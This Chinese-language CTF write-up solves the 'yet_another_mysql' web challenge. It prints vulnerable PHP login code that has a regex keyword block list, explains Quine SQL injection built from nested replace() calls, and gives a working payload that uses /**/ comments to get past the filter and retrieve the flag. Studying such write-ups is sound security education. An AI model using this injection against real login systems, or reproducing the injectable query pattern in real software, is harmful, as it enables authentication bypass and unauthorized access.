ctfHub|Recording

第五空间智能安全大赛-Web-yet_another_mysql|SQL|Quine注入

发现漏洞|key

花费50金币开启靶机,是一个login界面。
我是先一顿乱登陆，发现只有admin可以进去。（其实人家标题已经写清楚了e）
那就查看源码，发现/?source，疑似验证源码，访问一下。

那就开始代码审计

代码审计

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {//对输入的password字段的正则表达式匹配
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {//user不为admin不予通过，那就是user字段必须为admin
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);//对输入的password调用checksql进行校验
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";//这是关键的sql查询语句
    $user_result=mysqli_query($con,$sql);//将sql语句带入到数据库查询，查询成功返回true；否则返回false。
    $row = mysqli_fetch_array($user_result);//取出查询返回的对象
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {//将查询出来的password与输入的匹配，如果类型以及数据一样那就可以显示flag。
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}
if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

审计后的思路

1、首先校验存在一个正则表达式，这是不是可以通过/**/内联注释绕过，等下尝试以下。
2、

1
2
3

if ($row['password'] === $password) {//将查询出来的password与输入的匹配，如果类型以及数据一样那就可以显示flag。
    die($FLAG);
    }

这段代码说明我们只可以在password字段进行操作，但是限制得比较苛刻，只有密码完全匹配上才显示flag。平时我们做的sql题目就靠爆字段就可以爆出flag，这里使用以前的思路明显不可行。
这里的思路是：Quine注入，即控制我们输入的语句以及后端数据库处理后输出的sql语句一致就可以绕过密码验证输出flag了。
那么我们该如何构造输入输出一致的payload呢，接下来就是重点

Quine注入

1、首先得了解sql函数：replace()
replace(object,search,replace)
把object对象中出现的的search全部替换成replace

1	select replace(".",char(46),".");# char(46)就是.

输出：一个.
2、输入输出如何大致可以一致

1	select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

输出：

1	replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")")

但是还有单双引号不同。
3、解决单双引号不同的问题
有了上面的经验后，我们这样考虑，如果先将双引号替换成单引号是不是就可以解决引号不同的问题了。实现方法无非就是在套一层replace

1	select replace(replace('"."',char(34),char(39)),char(46),".");# 先执行内层replace

输出：’.’

1	select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

输出：

replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')//其实就是将2中的内容加上''以及去掉原来的''(因为是将这一整句话的""换成'')放入object以及replace中

此刻，输入输出完全一致。

构造payload

经过上面的分析，我们可以控制输入输出一致，但是还有一个问题，我们该如何绕过正则？
内联注释/**/
payload:

1
2

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

Char(34)：" ；Char(39)：' ； char(46)：.
输入到password中。
这样即可获取flag。

参考文献
SQL的replace()函数：https://www.php.cn/faq/554187.html
Quine注入：https://blog.csdn.net/weixin_53090346/article/details/125531088
php函数 mysqli_query：https://www.python100.com/html/55864.html
php函数 mysqli_fetch_array：https://www.php.cn/faq/585787.html
参考wp：https://www.cnblogs.com/zhengna/p/15917521.html